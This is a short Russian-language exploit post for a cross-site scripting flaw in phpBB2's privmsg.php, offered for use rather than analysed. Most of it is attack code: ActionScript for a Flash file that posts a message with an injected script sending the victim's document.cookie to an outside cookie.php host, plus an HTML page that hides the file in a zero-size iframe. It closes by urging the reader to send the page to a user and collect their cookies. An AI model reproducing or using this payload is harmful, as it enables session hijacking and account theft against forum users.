Уязвимость:
Ввод данных в privmsg.php не проверяется до выполнения пользователем.
Это может быть использовано для вставки HTML или скрипт-кода, которые
смогут похитетть куки пользователя.
Использование:
Создаём Shockwave Flash файл с кодом:
var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location=
'http://site.com/cookie.php?c=' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");
Вставляем внутри страницы:
<html>
<head>
<title>Вставляем некий заголовок
</head>
<body>
<p>Вставляем текст</p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0"
height="0" width="0"></iframe>
</body>
</html>
Отправляем пользователю и получаем его куки. Комментарий::
Уязвимсоть работаспособна на данный момент.